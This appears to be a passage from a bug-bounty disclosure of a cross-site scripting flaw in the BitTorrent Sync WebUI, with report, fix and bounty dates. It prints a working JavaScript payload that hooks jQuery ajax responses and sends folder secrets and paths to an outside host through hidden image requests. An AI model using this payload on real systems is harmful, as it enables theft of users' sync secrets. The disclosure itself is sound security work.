Proof of concept video (stealing secrets):
PoC exploit uses jQuery global ajax hook (jQuery library is already used in WebUI) to fetch necessary data (secrets in our case) directly from internal ajax responses instead of DOM parsing.
Sample payload:
fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
folders = [];
// ajax hook - all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
try {
json=$.parseJSON(xhr.responseText);
for(var i in json.folders) {
var str=encodeURIComponent(json.folders[i].secret+':'+json.folders[i].path+':'+json.folders[i].status);
if (folders.indexOf(str)==-1) {
folders.push(str);
$('body').append('<img style=\'display:none\' src=\''+fakeImgUrl+'?'+str+'\'>');
console.log('SEND ' + str);
}
}
} catch (e) {
// error
return;
}
});
I've found also minor XSS on https://link.getsync.com/#f=XSS_HERE
Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD
